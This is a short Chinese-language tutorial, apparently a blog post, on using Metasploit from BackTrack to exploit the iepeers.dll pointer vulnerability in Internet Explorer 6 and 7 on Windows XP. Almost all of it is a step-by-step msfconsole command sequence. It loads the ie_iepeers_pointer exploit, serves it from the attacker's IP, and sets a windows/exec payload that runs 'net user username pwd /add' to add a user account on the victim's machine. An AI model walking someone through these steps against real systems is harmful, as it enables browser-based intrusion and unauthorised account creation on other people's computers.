MSF利用最新IE最新漏洞

通过 backtrack 漏洞发布官网 了解最新漏洞

漏洞描述:漏洞存在iepeers.dll组件中,影响ie6 7
影响系统:sp0-3、ie 6 7

使用命令
show exploits
use exploit/windows/browser/ie_iepeers_pointer
show options
set PAYLOAD windows/exec
set CMD net user username pwd /add
exploit

okay, let's bounce!
***********************************************

#cd /pentest/exploits/framework3
#./msfconsole

msf>show exploits   查看漏洞脚本;ie漏洞windows/browser/ie_iepeers_pointer

msf>use exploit/windows/browser/ie_iepeers_pointer	使用ie该漏洞
msf exploit(ie_iepeers_pointer)>show options	查看必须要设置的参数

msf exploit(ie_iepeers_pointer)>set SRVHOST ip	设置加载本机ip网卡

msf exploit(ie_iepeers_pointer)>set PAYLOAD windows/exec	使用payload执行模块

msf exploit(ie_iepeers_pointer)>show options

msf exploit(ie_iepeers_pointer)>set CMD net user username pwd /add

msf exploit(ie_iepeers_pointer)>exploit

你可能感兴趣的:(IE,脚本,cmd,user)